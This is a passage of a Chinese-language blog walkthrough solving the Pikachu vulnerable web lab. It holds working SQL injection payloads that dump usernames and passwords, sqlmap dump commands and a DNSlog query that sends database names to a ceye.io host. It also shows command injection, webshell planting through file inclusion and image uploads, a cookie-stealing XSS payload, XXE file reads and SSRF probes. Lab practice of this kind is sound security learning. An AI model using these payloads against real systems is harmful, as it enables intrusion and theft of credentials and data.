<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">12</span><span class="string">&#x27;,phonenum=&#x27;</span><span class="number">1</span><span class="string">&#x27;,address=&#x27;</span><span class="number">1</span><span class="string">&#x27;,email=&#x27;</span><span class="number">1</span><span class="string">&#x27; where id=2 and extractvalue(1,concat(&quot;~&quot;,(select group_concat(concat_ws(&quot;-&quot;,username,password)) from users),&quot;~&quot;))#		</span></span><br></pre></td></tr></table></figure>
<p><img src="/post/7cfe8c25/image-20231208161839153.png" alt="image-20231208161839153" style="zoom:33%;"></p>
<h6 id="floor-1">floor</h6>
<p>构造如下sql语句</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">12</span><span class="string">&#x27;,phonenum=&#x27;</span><span class="number">1</span><span class="string">&#x27;,address=&#x27;</span><span class="number">1</span><span class="string">&#x27;,email=&#x27;</span><span class="number">1</span><span class="string">&#x27; where id=2 and (select count(*) from information_schema.tables group by concat((select group_concat(concat_ws(&quot;-&quot;,username,password)) from users),floor(rand(0)*2)))#</span></span><br></pre></td></tr></table></figure>
<p><img src="/post/7cfe8c25/image-20231208162357044.png" alt="image-20231208162357044" style="zoom:50%;"></p>
<h4 id="delete注入">delete注入</h4>
<p>通过测试，可以提交两份相同内容的留言板，但是删除的时候只会删除选中的，相同的内容不会被删除，说明不是通过内容删除帖子，猜测是通过id，同时尝试上传帖子内容：<code>真好')#</code>，发现删除还是很正常，说明应该没有通过内容查找id</p>
<p>查看前端代码，发现删除按钮绑定了一个url，包含了id的信息，说明是通过id删除的内容</p>
<figure>
<img src="/post/7cfe8c25/image-20231208163053645.png" alt="image-20231208163053645">
<figcaption aria-hidden="true">image-20231208163053645</figcaption>
</figure>
<p>猜测删除的语句为</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">delete</span> <span class="keyword">from</span> xxx <span class="keyword">where</span> id <span class="operator">=</span> <span class="string">&#x27;$id&#x27;</span></span><br></pre></td></tr></table></figure>
<p>所以我们可以通过构造url传id，将id构造成能返回私密信息的payload</p>
<p>流程就是判断是否是字符型，通过实验发现通过报错注入可以成功，将构造好的报错注入sql语句通过url编码之后放到id后面，然后构造sql语句如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=63%20and%20updatexml(1%2Cconcat(%27%2d%27%2C(select%20group_concat(password)%20from%20users))%2C1)</span><br></pre></td></tr></table></figure>
<p>如图所示，获取成功</p>
<p><img src="/post/7cfe8c25/image-20231208194108965.png" alt="image-20231208194108965" style="zoom: 25%;"></p>
<h4 id="http-header注入">"http header"注入</h4>
<p>如图所示是输入用户名密码之后的界面，说明前端在发送请求包给后端的时候，后端会获取前端请求头中的这些信息，并显示在界面上，猜测应该是获取到数据之后存在了数据库中，所以我们可以通过构造后端获取的参数的payload，使得后端能够执行我们所要执行的代码</p>
<p><img src="/post/7cfe8c25/image-20231208201644882.png" alt="image-20231208201644882" style="zoom:25%;"></p>
<p>此处选择更改user
agent，应该是获取之后insert到表中，但是不知道具体顺序，所以我们还是采取报错查询</p>
<p>构造user
agent如下，但是用注释符一直报错，查看源码，如图所示，后面应该用括号闭合</p>
<figure>
<img src="/post/7cfe8c25/image-20231208203421758.png" alt="image-20231208203421758">
<figcaption aria-hidden="true">image-20231208203421758</figcaption>
</figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; and updatexml(1, concat(0x7e, (select group_concat(concat_ws(&#x27;-&#x27;,username,password)) from users ),0x7e), 1),1,1 )#</span><br></pre></td></tr></table></figure>
<p>这里有点小坑，发现能报错注入之后，尝试获取数据库名称发现很好获取，但是获取用户名密码显示userid不符合格式，通过查看源码发现userid只有在验证用户登录之后才会正确赋值，所以在构造payload之前需要先设置好cookie为登录态</p>
<p><img src="/post/7cfe8c25/image-20231208204021238.png" alt="image-20231208204021238" style="zoom:25%;"></p>
<h4 id="盲注base-on-boolian">盲注（base on boolian）</h4>
<p>盲注可以在and后面添加判断条件，首先判断数据库名长度，然后是每个字符是什么</p>
<p>此处采用sqlmap工具进行盲注，但是通过测试发现该方法并不行，尝试写脚本解决（待做）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">#查询数据库【pikachu】 </span><br><span class="line">python sqlmap.py -u &quot;http://127.0.0.1/pikachu-master/vul/sqli/sqli_blind_b.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2&quot;  --dbs</span><br><span class="line"></span><br><span class="line">#获取数据库中的表【httpinfo,member,message,users,xssblind】 </span><br><span class="line">python sqlmap.py -u &quot;http://127.0.0.1/pikachu-master/vul/sqli/sqli_blind_b.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2&quot; -D pikachu --tables --batch --threads 10 </span><br><span class="line"></span><br><span class="line">#获取表中的字段名【...user,password,...】 </span><br><span class="line">python sqlmap.py -u &quot;http://127.0.0.1/pikachu-master/vul/sqli/sqli_blind_b.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2&quot;  -D pikachu -T users --columns --batch --threads 10 </span><br><span class="line"></span><br><span class="line">#获取字段信息</span><br><span class="line">python sqlmap.py -u &quot;http://127.0.0.1/pikachu-master/vul/sqli/sqli_blind_b.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2&quot; -D pikachu -T users -C username,password --dump --batch --threads 10</span><br></pre></td></tr></table></figure>
<p>除了sqlmap，通过学习，发现可以通过dnslog注入，构造语句如下</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">allen<span class="string">&#x27; and if((select load_file(concat(&#x27;</span><span class="operator">/</span><span class="operator">/</span><span class="string">&#x27;,(select database()),&#x27;</span><span class="number">.38</span>rbm5.ceye.io<span class="string">&#x27;))),1,0);#</span></span><br></pre></td></tr></table></figure>
<p>能发现发起了请求，但是没看到database内容</p>
<p><img src="/post/7cfe8c25/image-20231209154950331.png" alt="image-20231209154950331" style="zoom:33%;"></p>
<p>应该是mysql设置的问题，dnslog注入要求数据库有读写权限即：secure_file_priv=“”</p>
<h4 id="宽字节注入">宽字节注入</h4>
<p>通过测试发现输入allen'
#还是显示没有此人，应该是引号被转义了，所以我们构造宽字节，使得后端为了是我们引号转义添加的%df两个字节通过编码构成一个整的汉字，从而使得引号不被转义，构造如下</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">allen<span class="operator">%</span>df<span class="string">&#x27; union select 1,group_concat(username,0x3a,password) from users</span></span><br></pre></td></tr></table></figure>
<p>如图获取了用户名和密码</p>
<p><img src="/post/7cfe8c25/image-20231209160727966.png" alt="image-20231209160727966" style="zoom:33%;"></p>
<h3 id="rce">RCE</h3>
<h4 id="exec-ping">exec "ping"</h4>
<p>该漏洞即为ping的时候直接将输入的ip地址拼接到ping后面没有进行过滤，导致后面可以拼接其他命令，直接输入以下内容即可输出当前目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1 &amp;&amp; dir</span><br></pre></td></tr></table></figure>
<p><img src="/post/7cfe8c25/image-20231209161504390.png" alt="image-20231209161504390" style="zoom:25%;"></p>
<h4 id="exec-eval">exec "eval"</h4>
<p>如图所示为源码的内容，如果输入的字符无法被执行就输出下面的文本内容</p>
<p><img src="/post/7cfe8c25/image-20231209162249096.png" alt="image-20231209162249096" style="zoom: 33%;"></p>
<p>所以输入的字符只要是能执行就可以被成功执行，比如输入：<code>system("dir");</code>，如图所示是执行结果</p>
<p><img src="/post/7cfe8c25/image-20231209162419095.png" alt="image-20231209162419095" style="zoom:33%;"></p>
<h3 id="file-inclusion">File Inclusion</h3>
<h4 id="file-inclusionlocal">File Inclusion(local)</h4>
<p>通过burp抓取点击提交时的请求包，通过以下两份内容可以得知后端根据传递回来的文件名找取对应的运动员的简介和照片</p>
<p><img src="/post/7cfe8c25/image-20231209162721541.png" alt="image-20231209162721541" style="zoom: 50%;"><img src="/post/7cfe8c25/image-20231209162728117.png" alt="image-20231209162728117" style="zoom: 50%;"></p>
<p>通过加引号可以获取上一目录</p>
<p><img src="/post/7cfe8c25/image-20231209163402116.png" alt="image-20231209163402116" style="zoom:33%;"></p>
<h4 id="file-inclusionremote">File inclusion(remote)</h4>
<p>该漏洞是由于include在包含一个文件的时候，如果该文件的内容是php格式的，即使文件后缀是txt，也会当作php执行，我们可以构造一个txt文件，文件内容是在当前目录下生成一个一句话木马的文件，使得后端在include这个文件之后能够字典在当前目录下生成一个一句话木马</p>
<p>该txt文件作者已经帮我们构造好了</p>
<p><img src="/post/7cfe8c25/image-20231209170306135.png" alt="image-20231209170306135" style="zoom:25%;"></p>
<p>通过将这段url传递给include里的内容便可生成一个一句话木马的php文件，如图所示，系统自动帮我们清除掉了，但是这个一句话木马应该是能生效的</p>
<p><img src="/post/7cfe8c25/image-20231209170417039.png" alt="image-20231209170417039" style="zoom: 50%;"><img src="/post/7cfe8c25/image-20231209170427761.png" alt="image-20231209170427761" style="zoom:50%;"></p>
<h3 id="unsafe-filedownload">Unsafe Filedownload</h3>
<h4 id="unsafe-filedownload-1">Unsafe Filedownload</h4>
<p>如图所示，成功获取到我们想获取的文件内容</p>
<p><img src="/post/7cfe8c25/image-20231209170826773.png" alt="image-20231209170826773" style="zoom:25%;"></p>
<h3 id="unsafe-fileupload">Unsafe Fileupload</h3>
<h4 id="client-check">client check</h4>
<p>如图所示是在前端检验，先将php文件更改为png文件，然后在传包的时候再更改为php文件，直接用burp发送请求包即可</p>
<p><img src="/post/7cfe8c25/image-20231209171030032.png" alt="image-20231209171030032" style="zoom:25%;"><img src="/post/7cfe8c25/image-20231209171602746.png" alt="image-20231209171602746" style="zoom: 50%;"></p>
<p>如图所示，系统又自动给我删了，说明上传成功了，重新上传了phpInfo,如图所示，能正常展示</p>
<p><img src="/post/7cfe8c25/image-20231209171638525.png" alt="image-20231209171638525" style="zoom:33%;"><img src="/post/7cfe8c25/image-20231209171849749.png" alt="image-20231209171849749" style="zoom:33%;"></p>
<h4 id="mime-type">MIME type</h4>
<p>还是用上述一样的方式还是可以绕过</p>
<h4 id="getimagesize">getimagesize()</h4>
<p>该函数会在后端对上传的文件名的后缀进行检查，只能是规定之内的，该漏洞的利用要和前面的文件包含漏洞一起使用，也就是构造图片木马，将图片和一句话木马合并成一个图片，然后将该图片上传到服务器上，再通过文件包含漏洞包含该文件，就可以执行我们的一句话木马，攻击就能成功</p>
<p>将我们构造的图片木马进行上传，通过测试，如果文件就是由php文件更改后缀名上传的仍然会被检测出来，所以需要用真实的照片和文件进行合并上传，然后通过文件包含漏洞包含该文件，如图是攻击过程</p>
<p><img src="/post/7cfe8c25/image-20231209173053741.png" alt="image-20231209173053741" style="zoom:33%;"><img src="/post/7cfe8c25/image-20231209173337263.png" alt="image-20231209173337263" style="zoom: 25%;"></p>
<h3 id="over-permission">Over Permission</h3>
<h4 id="水平越权">水平越权</h4>
<p>在登录之后查看个人信息的url使用了get请求，只发送了username，可以通过更改username就可以查看其他人的信息，如图所示，即使当前登录者是lili，还是可以通过更改username修改信息</p>
<p><img src="/post/7cfe8c25/image-20231209173847365.png" alt="image-20231209173847365" style="zoom:33%;"></p>
<h4 id="垂直越权">垂直越权</h4>
<p>如图所示是admin删除人时的url，尝试通过普通用户访问该url</p>
<p><img src="/post/7cfe8c25/image-20231209174237525.png" alt="image-20231209174237525" style="zoom: 50%;"></p>
<p>访问前访问后没有区别，说明后端应该在删除人时设置了权限识别，查看后端源代码果然在删除时检查了session</p>
<p><img src="/post/7cfe8c25/image-20231209174553862.png" alt="image-20231209174553862" style="zoom:25%;"><img src="/post/7cfe8c25/image-20231209175011022.png" alt="image-20231209175011022" style="zoom:33%;"></p>
<p>但是通过查看源代码发现增加信息是没有检查session的，说明增加人的信息是可以通过普通权限做的</p>
<h3 id="section">../../</h3>
<h4 id="目录遍历">目录遍历</h4>
<p>还是构造访问刚才的图片木马</p>
<p><img src="/post/7cfe8c25/image-20231209180210007.png" alt="image-20231209180210007" style="zoom:33%;"></p>
<h3 id="敏感信息泄露">敏感信息泄露</h3>
<h4 id="icanseeyourabc">IcanseeyourABC</h4>
<p>用户信息出现在前端源代码中</p>
<p><img src="/post/7cfe8c25/image-20231209180532763.png" alt="image-20231209180532763" style="zoom:50%;"></p>
<h3 id="php反序列化">PHP反序列化</h3>
<h4 id="php反序列化漏洞">PHP反序列化漏洞</h4>
<p>查看源代码可以看到，将输入的php反序列化之后会输出变量test的内容，我们可以构造test内容为敏感信息，这样就能获取用户的敏感信息</p>
<p>构造如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:1:&quot;S&quot;:1:&#123;s:4:&quot;test&quot;;s:39:&quot;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p><img src="/post/7cfe8c25/image-20231209181653991.png" alt="image-20231209181653991" style="zoom: 33%;"></p>
<h3 id="xxe">XXE</h3>
<h4 id="xxe漏洞">XXE漏洞</h4>
<p>漏洞原理应该就是构造xml上传到服务器使得服务器解析之后执行返回结果，漏洞原理就是通过外部引用，访问服务器内部文件，并显示在前端界面，如下面所示，外部引用中外部DTD的URI可以是服务器敏感文件的目录，就可以敏感文件的信息赋值给我们的根元素</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">① 内部申明DTD格式</span><br><span class="line">&lt;!DOCTYPE 根元素 [元素申明]&gt;</span><br><span class="line"></span><br><span class="line">② 外部引用DTD格式</span><br><span class="line">&lt;!DOCTYPE 根元素 SYSTEM &quot;外部DTD的URI&quot;&gt;</span><br><span class="line"></span><br><span class="line">③ 引用公共DTD格式</span><br><span class="line">&lt;!DOCTYPE 根元素 PUBLIC &quot;DTD标识名&quot; &quot;公共DTD的URI&quot;&gt;</span><br></pre></td></tr></table></figure>
<p>比如此处可以使用如下构造方式</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot;  encoding=&quot;UTF-8&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE name [</span><br><span class="line">&lt;!ENTITY f SYSTEM &quot;file:///D://phpstudy_pro//WWW//pikachu//vul//unsafeupload//uploads//2023//12//09//158078657433f03558f337815476.txt&quot;&gt;]&gt;</span><br><span class="line">&lt;name&gt;&amp;f;&lt;/name&gt;</span><br></pre></td></tr></table></figure>
<p>便获取到了文件内容</p>
<p><img src="/post/7cfe8c25/image-20231209183749124.png" alt="image-20231209183749124" style="zoom:33%;"></p>
<h3 id="url重定向">URL重定向</h3>
<h4 id="不安全的url跳转">不安全的URL跳转</h4>
<p>url重定向导致钓鱼，就是设置一个按钮，该按钮链接到钓鱼网站</p>
<h3 id="ssrf">SSRF</h3>
<h4 id="ssrfcurl">SSRF(curl)</h4>
<p>如图所示，再url后面可以跟上我们上传的恶意文件并执行，我访问了一个上传的php文件，成功执行</p>
<p><img src="/post/7cfe8c25/image-20231209190208590.png" alt="image-20231209190208590" style="zoom:33%;"></p>
<p>PHP支持的由Daniel
Stenberg创建的libcurl库允许你与各种的服务器使用各种类型的协议进行连接和通讯。</p>
<p>libcurl目前支持http、https、ftp、gopher、telnet、dict、file和ldap协议。libcurl同时也支持HTTPS认证、HTTP
POST、HTTP PUT、 FTP 上传(这个也能通过PHP的FTP扩展完成)、HTTP
基于表单的上传、代理、cookies和用户名+密码的认证。</p>
<p>curl函数参考：https://www.runoob.com/php/php-ref-curl.html</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">//file协议读取</span><br><span class="line">?url=file:///D://jwt.txt</span><br><span class="line"></span><br><span class="line">//gopher协议</span><br><span class="line">//基本协议格式：URL:gopher://&lt;host&gt;:&lt;port&gt;/&lt;gopher-path&gt;_后接TCP数据流</span><br><span class="line">?url=gopher://119.23.243.154:22</span><br><span class="line"></span><br><span class="line">//dict协议</span><br><span class="line">?url=dict://119.23.243.154:22</span><br><span class="line"></span><br><span class="line">//http/https协议</span><br><span class="line">?url=http://x.x.x.x/</span><br><span class="line">?url=https://x.x.x.x/</span><br><span class="line"></span><br><span class="line">//探测内网其他主机的端口</span><br><span class="line">?url=http://x.x.x.x:port</span><br></pre></td></tr></table></figure>
<table>
<colgroup>
<col style="width: 33%">
<col style="width: 33%">
<col style="width: 33%">
</colgroup>
<thead>
<tr>
<th style="text-align: left;"><strong>file协议</strong></th>
<th style="text-align: left;"><strong>http/https协议</strong></th>
<th style="text-align: left;"><strong>端口</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: left;"><strong><img src="/post/7cfe8c25/20200715182340.png" alt="img"></strong></td>
<td style="text-align: left;"><strong><img src="/post/7cfe8c25/20200715182343.png" alt="img"></strong></td>
<td style="text-align: left;"><strong><img src="/post/7cfe8c25/20200715182346.png" alt="img"></strong></td>
</tr>
</tbody>
</table>
<p><strong>源码分析</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>]) &amp;&amp; <span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>] != <span class="literal">null</span>)&#123;</span><br><span class="line">    <span class="comment">//接收前端URL没问题,但是要做好过滤,如果不做过滤,就会导致SSRF</span></span><br><span class="line">    <span class="variable">$URL</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>];</span><br><span class="line">    <span class="variable">$CH</span> = <span class="title function_ invoke__">curl_init</span>(<span class="variable">$URL</span>);</span><br><span class="line">    <span class="title function_ invoke__">curl_setopt</span>(<span class="variable">$CH</span>, CURLOPT_HEADER, <span class="literal">FALSE</span>);</span><br><span class="line">    <span class="title function_ invoke__">curl_setopt</span>(<span class="variable">$CH</span>, CURLOPT_SSL_VERIFYPEER, <span class="literal">FALSE</span>);</span><br><span class="line">    <span class="variable">$RES</span> = <span class="title function_ invoke__">curl_exec</span>(<span class="variable">$CH</span>);</span><br><span class="line">    <span class="title function_ invoke__">curl_close</span>(<span class="variable">$CH</span>) ;</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$RES</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>前端传进来的url被后台使用curl_exec()进行了请求,然后将请求的结果又返回给了前端，并且没做任何过滤或限制。从而导致了用户可能可以通过这个漏洞进行一些内网服务探测等等</p>
<p>参考：<a target="_blank" rel="noopener" href="https://segmentfault.com/a/1190000021810264">SSRF原理实战及修复方式</a></p>
<h4 id="ssrffile_get_content">SSRF(file_get_content)</h4>
<p>一样的构造方法</p>
<p><img src="/post/7cfe8c25/image-20231209190914600.png" alt="image-20231209190914600" style="zoom:25%;"></p>
<p>file_get_contents()
把整个文件读入一个字符串中。该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持，还会使用内存映射技术来增强性能。</p>
<p>函数语法:
file_get_contents(path,include_path,context,start,max_length)</p>
<table>
<colgroup>
<col style="width: 16%">
<col style="width: 83%">
</colgroup>
<thead>
<tr>
<th style="text-align: left;">参数</th>
<th style="text-align: left;">描述</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: left;">path</td>
<td style="text-align: left;">必需。规定要读取的文件。</td>
</tr>
<tr>
<td style="text-align: left;">include_path</td>
<td style="text-align: left;">可选。如果您还想在 include_path（在
php.ini 中）中搜索文件的话，请设置该参数为 ‘1’。</td>
</tr>
<tr>
<td style="text-align: left;">context</td>
<td style="text-align: left;">可选。规定文件句柄的环境。context
是一套可以修改流的行为的选项。若使用 NULL，则忽略。</td>
</tr>
<tr>
<td style="text-align: left;">start</td>
<td style="text-align: left;">可选。规定在文件中开始读取的位置。该参数是
PHP 5.1 中新增的。</td>
</tr>
<tr>
<td style="text-align: left;">max_length</td>
<td style="text-align: left;">可选。规定读取的字节数。该参数是 PHP 5.1
中新增的。</td>
</tr>
</tbody>
</table>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">//file协议读取</span><br><span class="line">?file=file:///D://jwt.txt</span><br><span class="line"></span><br><span class="line">//读取php源码</span><br><span class="line">?file=php://filter/read=convert.base64-encode/resource=ssrf.php</span><br><span class="line"></span><br><span class="line">//内网其它主机请求</span><br><span class="line">?file=http://x.x.x.x/xx.index</span><br><span class="line"></span><br><span class="line">//探测内网其他主机的端口</span><br><span class="line">?file=http://x.x.x.x:port</span><br><span class="line">    </span><br></pre></td></tr></table></figure>
<p>源码分析</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>]) &amp;&amp; <span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>] !=<span class="literal">null</span>)&#123;</span><br><span class="line">    <span class="variable">$filename</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line">    <span class="variable">$str</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$filename</span>);</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$str</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>直接访问获取到的文件</p>
</div><div class="article-licensing box"><div class="licensing-title"><p>pikachu通关</p><p><a href="http://example.com/post/7cfe8c25.html">http://example.com/post/7cfe8c25.html</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>Author</h6><p>yyyyyyxnp</p></div></div><div class="level-item is-narrow"><div><h6>Posted on</h6><p>2023-12-06</p></div></div><div class="level-item is-narrow"><div><h6>Updated on</h6><p>2024-09-29</p></div></div><div class="level-item is-narrow"><div><h6>Licensed under</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="article-tags is-size-7 mb-4"><span class="mr-2">#</span><a class="link-muted mr-2" rel="tag" href="/tags/php/">php</a></div><div class="notification is-danger">You need to set <code>install_url</code> to use ShareThis. Please set it in <code>_config.yml</code>.</div></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">Like this article? Support the author with</h3><div class="buttons is-centered"><a class="button donate" href="/" target="_blank" rel="noopener" data-type="afdian"><span class="icon is-small"><i class="fas fa-charging-station"></i></span><span>Afdian.net</span></a><a class="button donate" data-type="alipay"><span class="icon is-small"><i class="fab fa-alipay"></i></span><span>Alipay</span><span class="qrcode"><img src="/" alt="Alipay"></span></a><a class="button donate" href="/" target="_blank" rel="noopener" data-type="buymeacoffee"><span class="icon is-small"><i class="fas fa-coffee"></i></span><span>Buy me a coffee</span></a><a class="button donate" href="/" target="_blank" rel="noopener" data-type="patreon"><span class="icon is-small"><i class="fab fa-patreon"></i></span><span>Patreon</span></a><div class="notification is-danger">You forgot to set the <code>business</code> or <code>currency_code</code> for Paypal. Please set it in <code>_config.yml</code>.</div><a class="button donate" data-type="wechat"><span class="icon is-small"><i class="fab fa-weixin"></i></span><span>Wechat</span><span class="qrcode"><img src="/" alt="Wechat"></span></a></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/post/b3432909.html"><i class="level-item fas fa-chevron-left"></i><span class="level-item">sqli-labs</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/post/4d65bd11.html"><span class="level-item">leetcode面试100题</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">Comments</h3><div class="notification is-danger">You forgot to set the <code>shortname</code> for Disqus. Please set it in <code>_config.yml</code>.</div></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-4-widescreen  order-1 is-sticky"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar is-rounded" src="/img/avatar.png" alt="Yyyyyyxnp"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">Yyyyyyxnp</p><p class="is-size-6 is-block">Student Yang</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>Sichuan University</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">Posts</p><a href="/archives"><p class="title">46</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Categories</p><a href="/categories"><p class="title">7</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Tags</p><a href="/tags"><p class="title">6</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/deng12yx" target="_blank" rel="me noopener">Follow</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Github" href="https://github.com/deng12yx"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Facebook" href="https://facebook.com"><i class="fab fa-facebook"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Twitter" href="https://twitter.com"><i class="fab fa-twitter"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Dribbble" href="https://dribbble.com"><i class="fab fa-dribbble"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="RSS" href="/"><i class="fas fa-rss"></i></a></div></div></div><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">Catalogue</h3><ul class="menu-list"><li><a class="level is-mobile" href="#pikachu通关"><span class="level-left"><span class="level-item">1</span><span class="level-item">pikachu通关</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#暴力破解"><span class="level-left"><span class="level-item">1.1</span><span class="level-item">暴力破解</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#基于表单的暴力破解"><span class="level-left"><span class="level-item">1.1.1</span><span class="level-item">基于表单的暴力破解</span></span></a></li><li><a class="level is-mobile" href="#验证码绕过on-server"><span class="level-left"><span class="level-item">1.1.2</span><span class="level-item">验证码绕过（On server）</span></span></a></li><li><a class="level is-mobile" href="#验证码绕过on-client"><span class="level-left"><span class="level-item">1.1.3</span><span class="level-item">验证码绕过（On Client）</span></span></a></li><li><a class="level is-mobile" href="#token防爆破"><span class="level-left"><span class="level-item">1.1.4</span><span class="level-item">token防爆破</span></span></a></li></ul></li><li><a class="level is-mobile" href="#跨站脚本攻击"><span class="level-left"><span class="level-item">1.2</span><span class="level-item">跨站脚本攻击</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#反射型xssget"><span class="level-left"><span class="level-item">1.2.1</span><span class="level-item">反射型xss（get）</span></span></a></li><li><a class="level is-mobile" href="#反射型xsspost"><span class="level-left"><span class="level-item">1.2.2</span><span class="level-item">反射型xss（post）</span></span></a></li><li><a class="level is-mobile" href="#存储型xss"><span class="level-left"><span class="level-item">1.2.3</span><span class="level-item">存储型xss</span></span></a></li><li><a class="level is-mobile" href="#dom型xss"><span class="level-left"><span class="level-item">1.2.4</span><span class="level-item">DOM型xss</span></span></a></li><li><a class="level is-mobile" href="#dom型xss-x"><span class="level-left"><span class="level-item">1.2.5</span><span class="level-item">DOM型xss-x</span></span></a></li><li><a class="level is-mobile" href="#xss之盲打"><span class="level-left"><span class="level-item">1.2.6</span><span 